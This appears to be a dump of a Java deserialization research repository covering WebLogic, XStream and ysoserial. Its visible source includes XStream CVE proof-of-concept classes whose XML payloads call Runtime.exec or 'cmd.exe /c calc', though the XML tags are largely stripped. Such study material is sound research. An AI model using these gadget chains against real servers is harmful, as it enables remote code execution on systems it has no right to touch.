-------------------------------------------------------------------------------- /weblogic/target/classes/com/r17a/weblogic/supeream/serial/Reflections.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/target/classes/com/r17a/weblogic/supeream/serial/Reflections.class -------------------------------------------------------------------------------- /weblogic/target/classes/com/r17a/weblogic/supeream/serial/SerialDataGenerator.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/target/classes/com/r17a/weblogic/supeream/serial/SerialDataGenerator.class -------------------------------------------------------------------------------- /weblogic/target/classes/com/r17a/weblogic/supeream/serial/Serializables.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/target/classes/com/r17a/weblogic/supeream/serial/Serializables.class -------------------------------------------------------------------------------- /weblogic/target/classes/com/r17a/weblogic/supeream/ssl/SocketFactory.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/target/classes/com/r17a/weblogic/supeream/ssl/SocketFactory.class -------------------------------------------------------------------------------- /weblogic/target/classes/com/r17a/weblogic/supeream/ssl/TrustManagerImpl.class: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/target/classes/com/r17a/weblogic/supeream/ssl/TrustManagerImpl.class -------------------------------------------------------------------------------- /weblogic/target/classes/com/r17a/weblogic/supeream/ssl/WeblogicTrustManager.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/target/classes/com/r17a/weblogic/supeream/ssl/WeblogicTrustManager.class -------------------------------------------------------------------------------- /weblogic/target/classes/com/r17a/weblogic/supeream/weblogic/BypassPayloadSelector.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/target/classes/com/r17a/weblogic/supeream/weblogic/BypassPayloadSelector.class -------------------------------------------------------------------------------- /weblogic/target/classes/com/r17a/weblogic/supeream/weblogic/ObjectTest.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/target/classes/com/r17a/weblogic/supeream/weblogic/ObjectTest.class -------------------------------------------------------------------------------- /weblogic/target/classes/com/r17a/weblogic/supeream/weblogic/T3ProtocolOperation.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/target/classes/com/r17a/weblogic/supeream/weblogic/T3ProtocolOperation.class -------------------------------------------------------------------------------- 
/weblogic/target/classes/com/r17a/weblogic/supeream/weblogic/T3Test.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/target/classes/com/r17a/weblogic/supeream/weblogic/T3Test.class -------------------------------------------------------------------------------- /weblogic/target/classes/com/r17a/weblogic/supeream/weblogic/WebLogicOperation.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/target/classes/com/r17a/weblogic/supeream/weblogic/WebLogicOperation.class -------------------------------------------------------------------------------- /weblogic/target/classes/com/supeream/Main.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/target/classes/com/supeream/Main.class -------------------------------------------------------------------------------- /weblogic/target/classes/com/supeream/payload/PayloadTest.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/target/classes/com/supeream/payload/PayloadTest.class -------------------------------------------------------------------------------- /weblogic/target/classes/com/supeream/payload/RemoteImpl.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/target/classes/com/supeream/payload/RemoteImpl.class -------------------------------------------------------------------------------- 
/weblogic/target/classes/com/supeream/serial/BytesOperation.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/target/classes/com/supeream/serial/BytesOperation.class -------------------------------------------------------------------------------- /weblogic/target/classes/com/supeream/serial/Reflections.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/target/classes/com/supeream/serial/Reflections.class -------------------------------------------------------------------------------- /weblogic/target/classes/com/supeream/serial/SerialDataGenerator.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/target/classes/com/supeream/serial/SerialDataGenerator.class -------------------------------------------------------------------------------- /weblogic/target/classes/com/supeream/serial/Serializables.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/target/classes/com/supeream/serial/Serializables.class -------------------------------------------------------------------------------- /weblogic/target/classes/com/supeream/ssl/SocketFactory.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/target/classes/com/supeream/ssl/SocketFactory.class -------------------------------------------------------------------------------- 
/weblogic/target/classes/com/supeream/ssl/TrustManagerImpl.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/target/classes/com/supeream/ssl/TrustManagerImpl.class -------------------------------------------------------------------------------- /weblogic/target/classes/com/supeream/ssl/WeblogicTrustManager.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/target/classes/com/supeream/ssl/WeblogicTrustManager.class -------------------------------------------------------------------------------- /weblogic/target/classes/com/supeream/weblogic/BypassPayloadSelector.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/target/classes/com/supeream/weblogic/BypassPayloadSelector.class -------------------------------------------------------------------------------- /weblogic/target/classes/com/supeream/weblogic/ObjectTest.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/target/classes/com/supeream/weblogic/ObjectTest.class -------------------------------------------------------------------------------- /weblogic/target/classes/com/supeream/weblogic/T3ProtocolOperation.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/target/classes/com/supeream/weblogic/T3ProtocolOperation.class -------------------------------------------------------------------------------- 
/weblogic/target/classes/com/supeream/weblogic/T3Test.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/target/classes/com/supeream/weblogic/T3Test.class -------------------------------------------------------------------------------- /weblogic/target/classes/com/supeream/weblogic/WebLogicOperation.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/weblogic/target/classes/com/supeream/weblogic/WebLogicOperation.class -------------------------------------------------------------------------------- /xstream/pom.xml: -------------------------------------------------------------------------------- 1 | 2 | 5 | 6 | JavaVulnSummary 7 | com.r17a 8 | 1.0-SNAPSHOT 9 | 10 | 4.0.0 11 | 12 | xstream 13 | 14 | 15 | 16 | org.apache.maven.plugins 17 | maven-compiler-plugin 18 | 19 | 6 20 | 6 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | com.thoughtworks.xstream 29 | xstream 30 | 1.4.16 31 | 32 | 33 | javassist 34 | javassist 35 | 3.12.1.GA 36 | compile 37 | 38 | 39 | 40 | -------------------------------------------------------------------------------- /xstream/src/main/java/com/r17a/xstream/cve/hashmap/CVE_2021_39152.java: -------------------------------------------------------------------------------- 1 | package com.r17a.xstream.cve.hashmap; 2 | 3 | import com.thoughtworks.xstream.XStream; 4 | 5 | public class CVE_2021_39152 { 6 | public static void main(String[] args) { 7 | String xml = "\n" + 8 | " \n" + 9 | " \n" + 10 | " http://localhost:8080/internal/\n" + 11 | " GBK\n" + 12 | " 1111\n" + 13 | " b\n" + 14 | " 0\n" + 15 | " 0\n" + 16 | " \n" + 17 | " \n" + 18 | " \n" + 19 | " \n" + 20 | " \n" + 21 | " http://localhost:8080/internal/\n" + 22 | " \n" + 23 | " 1111\n" + 24 | " b\n" + 25 | " 0\n" + 26 | " 
0\n" + 27 | " \n" + 28 | " \n" + 29 | " \n" + 30 | ""; 31 | XStream xstream = new XStream(); 32 | xstream.fromXML(xml); 33 | } 34 | } 35 | -------------------------------------------------------------------------------- /xstream/src/main/java/com/r17a/xstream/cve/priorityqueue/CVE_2021_39144.java: -------------------------------------------------------------------------------- 1 | package com.r17a.xstream.cve.priorityqueue; 2 | 3 | import com.thoughtworks.xstream.XStream; 4 | 5 | import java.util.PriorityQueue; 6 | 7 | public class CVE_2021_39144 { 8 | public static void main(String[] args) { 9 | XStream xStream = new XStream(); 10 | // String xml = xStream.toXML(getpayloadObject()); 11 | String xml = "\n" + 12 | " \n" + 13 | " \n" + 14 | " \n" + 15 | " 2\n" + 16 | " \n" + 17 | " 3\n" + 18 | " \n" + 19 | " java.lang.Comparable\n" + 20 | " \n" + 21 | " true\n" + 22 | " java.lang.Comparable\n" + 23 | " \n" + 24 | " \n" + 25 | " \n" + 26 | " java.lang.Comparable\n" + 27 | " compareTo\n" + 28 | " \n" + 29 | " java.lang.Object\n" + 30 | " \n" + 31 | " \n" + 32 | " \n" + 33 | " \n" + 34 | " \n" + 35 | " java.lang.Runtime\n" + 36 | " exec\n" + 37 | " \n" + 38 | " java.lang.String\n" + 39 | " \n" + 40 | " \n" + 41 | " \n" + 42 | " \n" + 43 | " \n" + 44 | " \n" + 45 | " \n" + 46 | " calc\n" + 47 | " \n" + 48 | ""; 49 | xStream.fromXML(xml); 50 | } 51 | 52 | public static PriorityQueue getpayloadObject() { 53 | PriorityQueue priorityQueue = new PriorityQueue(); 54 | return priorityQueue; 55 | } 56 | } 57 | -------------------------------------------------------------------------------- /xstream/src/main/java/com/r17a/xstream/cve/priorityqueue/test.java: -------------------------------------------------------------------------------- 1 | package com.r17a.xstream.cve.priorityqueue; 2 | 3 | public class test { 4 | public static void main(String[] args) throws ClassNotFoundException { 5 | String xml = "\n" + 6 | "test-view\n" + 7 | "用于测试的视图1111\n" + 8 | "false\n" + 9 | "false\n" 
+ 10 | "\n" + 11 | "\n" + 12 | "\n" + 13 | "\n" + 14 | "\n" + 15 | "\n" + 16 | "\n" + 17 | "\n" + 18 | "\n" + 19 | "\n" + 20 | "\n" + 21 | "\n" + 22 | "\n" + 23 | "\n" + 24 | "\n" + 25 | "false\n" + 26 | ""; 27 | System.out.println(xml); 28 | } 29 | } 30 | -------------------------------------------------------------------------------- /xstream/src/main/java/com/r17a/xstream/cve/sortedset/CVE_2019_10173.java: -------------------------------------------------------------------------------- 1 | package com.r17a.xstream.cve.sortedset; 2 | 3 | import com.thoughtworks.xstream.XStream; 4 | 5 | import java.io.IOException; 6 | 7 | //XStream <=1.4.6和1.4.10 8 | 9 | public class CVE_2019_10173 { 10 | // public static String expGen(){ 11 | // XStream xstream = new XStream(); 12 | // Set set = new TreeSet(); 13 | // set.add("foo"); 14 | // set.add(EventHandler.create(Comparable.class, new ProcessBuilder("calc"), "start")); 15 | // String payload = xstream.toXML(set); 16 | // System.out.println(payload); 17 | // return payload; 18 | // } 19 | public static void main(String[] args) throws IOException { 20 | // expGen(); 21 | XStream xStream = new XStream(); 22 | String payload = "\n" + 23 | " foo\n" + 24 | " \n" + 25 | " java.lang.Comparable\n" + 26 | " \n" + 27 | " \n" + 28 | " \n" + 29 | " cmd.exe\n" + 30 | " /c\n" + 31 | " calc\n" + 32 | " \n" + 33 | " \n" + 34 | " start"+ 35 | " \n" + 36 | " \n" + 37 | "\n"; 38 | xStream.fromXML(payload); 39 | } 40 | } -------------------------------------------------------------------------------- /xstream/src/main/java/com/r17a/xstream/test/School.java: -------------------------------------------------------------------------------- 1 | package com.r17a.xstream.test; 2 | 3 | public class School { 4 | private String name; 5 | private int classNum; 6 | 7 | public School(String name, int classNum) { 8 | this.name = name; 9 | this.classNum = classNum; 10 | } 11 | } 12 | 
--------------------------------------------------------------------------------
/xstream/src/main/java/com/r17a/xstream/test/Student.java:
--------------------------------------------------------------------------------
package com.r17a.xstream.test;

import java.io.IOException;
import java.io.Serializable;

/**
 * Serializable sample type with custom {@code readObject}/{@code writeObject} hooks.
 *
 * <p>Each hook delegates to the default behaviour and then prints a marker, so the console
 * shows when a serializer actually routes the object through it. Presumably this is how the
 * author confirmed that XStream calls such hooks for Serializable types; the security
 * relevance is that any {@code readObject} logic then runs while a document is being parsed.
 */
public class Student implements Serializable {
    private String name;
    private int age;
    private School school;

    /**
     * @param name   student name
     * @param age    student age
     * @param school nested object stored as-is
     */
    public Student(String name, int age, School school) {
        this.school = school;
        this.age = age;
        this.name = name;
    }

    /** Deserialization hook: default field restore, then a marker ("XML deserialization"). */
    private void readObject(java.io.ObjectInputStream in) throws IOException, ClassNotFoundException {
        in.defaultReadObject();
        System.out.println("XML反序列化");
    }

    /** Serialization hook: default field write, then a marker ("XML serialization"). */
    private void writeObject(java.io.ObjectOutputStream out) throws IOException, ClassNotFoundException {
        out.defaultWriteObject();
        System.out.println("XML序列化");
    }
}
--------------------------------------------------------------------------------
/xstream/src/main/java/com/r17a/xstream/test/Test.java:
--------------------------------------------------------------------------------
package com.r17a.xstream.test;

import com.thoughtworks.xstream.XStream;

import java.lang.reflect.InvocationHandler;
import java.lang.reflect.Method;
import java.lang.reflect.Proxy;

/**
 * Scratch test showing what XStream emits for two kinds of object: a Serializable bean with
 * custom hooks ({@code Student}) and a {@code java.lang.reflect.Proxy} instance.
 *
 * <p>The XStream instance is used with its default configuration (no type permissions are
 * set). That is acceptable here only because every document it parses was produced a few
 * lines earlier by the same program; it is not a pattern for handling external XML.
 */
public class Test {
    /**
     * Serializes a Student, prints and re-parses the XML, then serializes a dynamic proxy and
     * prints that XML as well. Re-parsing the proxy XML is left disabled.
     *
     * @param args unused
     */
    public static void main(String[] args) {
        final XStream serializer = new XStream();

        // Round trip of an ordinary object graph.
        final Student student = new Student("xiaoming", 25, new School("北京大学", 500));
        final String studentXml = serializer.toXML(student);
        System.out.println(studentXml);
        final Student roundTripped = (Student) serializer.fromXML(studentXml);

        // Handler that answers every call on the proxy with a fixed string ("this is the proxy method").
        final InvocationHandler fixedAnswer = new InvocationHandler() {
            @Override
            public Object invoke(Object target, Method invoked, Object[] callArgs) throws Throwable {
                return "这里是代理方法";
            }
        };

        // The proxy must be typed as an interface of the proxied class; casting it to the
        // implementation class would fail.
        final ClassLoader loader = ImpTest.class.getClassLoader();
        final Class<?>[] contracts = ImpTest.class.getInterfaces();
        final TestInterface proxied = (TestInterface) Proxy.newProxyInstance(loader, contracts, fixedAnswer);

        final String proxyXml = serializer.toXML(proxied);
        System.out.println(proxyXml);
//        xStream.fromXML(proxyStr);
    }
}

/** Interface implemented by {@link ImpTest} and by the dynamic proxy built in {@link Test}. */
interface TestInterface {
    String test();

    String test1(String a);
}

/** Concrete implementation; its interfaces and class loader are used to build the proxy. */
class ImpTest implements TestInterface {

    /** @return fixed text ("this is the method of the proxied class") */
    @Override
    public String test() {
        return "这里是被代理类的方法";
    }

    /** @return fixed text ("this is the method of the proxied class 1111") followed by {@code a} */
    @Override
    public String test1(String a) {
        return "这里是被代理类的方法1111" + a;
    }
}
-------------------------------------------------------------------------------- /xstream/target/classes/com/r17a/xstream/cve/eventlistenerlist/CVE_2021_39151.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/xstream/target/classes/com/r17a/xstream/cve/eventlistenerlist/CVE_2021_39151.class -------------------------------------------------------------------------------- /xstream/target/classes/com/r17a/xstream/cve/hashmap/CVE_2020_26217.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/xstream/target/classes/com/r17a/xstream/cve/hashmap/CVE_2020_26217.class -------------------------------------------------------------------------------- /xstream/target/classes/com/r17a/xstream/cve/hashmap/CVE_2021_39152.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/xstream/target/classes/com/r17a/xstream/cve/hashmap/CVE_2021_39152.class -------------------------------------------------------------------------------- /xstream/target/classes/com/r17a/xstream/cve/linkedhashset/CVE_2021_39139.class:
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/xstream/target/classes/com/r17a/xstream/cve/linkedhashset/CVE_2021_39139.class -------------------------------------------------------------------------------- /xstream/target/classes/com/r17a/xstream/cve/linkedhashset/CVE_2021_39140.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/xstream/target/classes/com/r17a/xstream/cve/linkedhashset/CVE_2021_39140.class -------------------------------------------------------------------------------- /xstream/target/classes/com/r17a/xstream/cve/linkedhashset/CVE_2021_39149.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/xstream/target/classes/com/r17a/xstream/cve/linkedhashset/CVE_2021_39149.class -------------------------------------------------------------------------------- /xstream/target/classes/com/r17a/xstream/cve/priorityqueue/CVE_2021_21344.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/xstream/target/classes/com/r17a/xstream/cve/priorityqueue/CVE_2021_21344.class -------------------------------------------------------------------------------- /xstream/target/classes/com/r17a/xstream/cve/priorityqueue/CVE_2021_21345.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/xstream/target/classes/com/r17a/xstream/cve/priorityqueue/CVE_2021_21345.class 
-------------------------------------------------------------------------------- /xstream/target/classes/com/r17a/xstream/cve/priorityqueue/CVE_2021_39141.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/xstream/target/classes/com/r17a/xstream/cve/priorityqueue/CVE_2021_39141.class -------------------------------------------------------------------------------- /xstream/target/classes/com/r17a/xstream/cve/priorityqueue/CVE_2021_39144.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/xstream/target/classes/com/r17a/xstream/cve/priorityqueue/CVE_2021_39144.class -------------------------------------------------------------------------------- /xstream/target/classes/com/r17a/xstream/cve/priorityqueue/CVE_2021_39145.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/xstream/target/classes/com/r17a/xstream/cve/priorityqueue/CVE_2021_39145.class -------------------------------------------------------------------------------- /xstream/target/classes/com/r17a/xstream/cve/priorityqueue/CVE_2021_39150.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/xstream/target/classes/com/r17a/xstream/cve/priorityqueue/CVE_2021_39150.class -------------------------------------------------------------------------------- /xstream/target/classes/com/r17a/xstream/cve/priorityqueue/CVE_2021_39153.class: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/xstream/target/classes/com/r17a/xstream/cve/priorityqueue/CVE_2021_39153.class -------------------------------------------------------------------------------- /xstream/target/classes/com/r17a/xstream/cve/priorityqueue/test.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/xstream/target/classes/com/r17a/xstream/cve/priorityqueue/test.class -------------------------------------------------------------------------------- /xstream/target/classes/com/r17a/xstream/cve/sortedset/CVE_2019_10173.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/xstream/target/classes/com/r17a/xstream/cve/sortedset/CVE_2019_10173.class -------------------------------------------------------------------------------- /xstream/target/classes/com/r17a/xstream/cve/sortedset/CVE_2021_39146.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/xstream/target/classes/com/r17a/xstream/cve/sortedset/CVE_2021_39146.class -------------------------------------------------------------------------------- /xstream/target/classes/com/r17a/xstream/cve/sortedset/CVE_2021_39147.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/xstream/target/classes/com/r17a/xstream/cve/sortedset/CVE_2021_39147.class -------------------------------------------------------------------------------- /xstream/target/classes/com/r17a/xstream/cve/sortedset/CVE_2021_39148.class: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/xstream/target/classes/com/r17a/xstream/cve/sortedset/CVE_2021_39148.class -------------------------------------------------------------------------------- /xstream/target/classes/com/r17a/xstream/cve/sortedset/CVE_2021_39154.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/xstream/target/classes/com/r17a/xstream/cve/sortedset/CVE_2021_39154.class -------------------------------------------------------------------------------- /xstream/target/classes/com/r17a/xstream/test/ImpTest.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/xstream/target/classes/com/r17a/xstream/test/ImpTest.class -------------------------------------------------------------------------------- /xstream/target/classes/com/r17a/xstream/test/School.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/xstream/target/classes/com/r17a/xstream/test/School.class -------------------------------------------------------------------------------- /xstream/target/classes/com/r17a/xstream/test/Student.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/xstream/target/classes/com/r17a/xstream/test/Student.class -------------------------------------------------------------------------------- /xstream/target/classes/com/r17a/xstream/test/Test$1.class: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/xstream/target/classes/com/r17a/xstream/test/Test$1.class -------------------------------------------------------------------------------- /xstream/target/classes/com/r17a/xstream/test/Test.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/xstream/target/classes/com/r17a/xstream/test/Test.class -------------------------------------------------------------------------------- /xstream/target/classes/com/r17a/xstream/test/TestInterface.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R17a-17/JavaVulnSummary/81a6134bc7dc2982888c1120ab7ef8fe8f4f080d/xstream/target/classes/com/r17a/xstream/test/TestInterface.class -------------------------------------------------------------------------------- /ysoserial/pom.xml: -------------------------------------------------------------------------------- 1 | 2 | 5 | 6 | JavaVulnSummary 7 | com.r17a 8 | 1.0-SNAPSHOT 9 | 10 | 4.0.0 11 | 12 | ysoserial 13 | 14 | 15 | 16 | javassist 17 | javassist 18 | 3.12.1.GA 19 | 20 | 21 | org.beanshell 22 | bsh 23 | 2.0b5 24 | 25 | 26 | com.r17a 27 | weblogic 28 | 1.0-SNAPSHOT 29 | compile 30 | 31 | 32 | com.r17a 33 | common 34 | 1.0-SNAPSHOT 35 | compile 36 | 37 | 38 | commons-beanutils 39 | commons-beanutils 40 | 1.9.2 41 | 42 | 43 | commons-collections 44 | commons-collections 45 | 3.1 46 | 47 | 48 | org.apache.commons 49 | commons-collections4 50 | 4.0 51 | 52 | 53 | org.python 54 | jython-standalone 55 | 2.5.2 56 | 57 | 58 | commons-io 59 | commons-io 60 | 2.6 61 | 62 | 63 | 64 | 65 | -------------------------------------------------------------------------------- 
/ysoserial/src/main/java/com/r17a/ysoserial/jdk7u21/HashBruteTest.java: -------------------------------------------------------------------------------- 1 | package com.r17a.ysoserial.jdk7u21; 2 | 3 | public class HashBruteTest { 4 | public static void main(String[] args) { 5 | // System.out.println(Long.toHexString(4276154445L).hashCode()); 6 | // for (long i = 0; i < 9999999999L; i++) { 7 | // if (Long.toHexString(i).hashCode() == 15) { 8 | // System.out.println(Long.toHexString(i)); 9 | // } 10 | // } 11 | caculate(); 12 | // int x=114; 13 | // 14 | // x ^= (x >>> 20) ^ (x>>> 12); 15 | // System.out.println( x ^ (x >>> 7) ^ (x >>> 4)); 16 | // System.out.println("---------------------"); 17 | // System.out.println(intHash(new int[]{-16})); 18 | 19 | } 20 | 21 | public static void caculate() { 22 | 23 | for (int i = 0; i < 100;i++){ 24 | int h =0; 25 | h ^= i; 26 | h ^= (h >>> 20) ^ (h >>> 12); 27 | 28 | if ( (h ^ (h >>> 7) ^ (h >>> 4) )== 15){ 29 | System.out.println("i:" + i); 30 | } 31 | } 32 | } 33 | 34 | public static int intHash(int[] a){ 35 | if (a == null) 36 | return 0; 37 | 38 | int result = 1; 39 | for (int element : a) 40 | result = 31 * result + element; 41 | 42 | return result; 43 | } 44 | } 45 | --------------------------------------------------------------------------------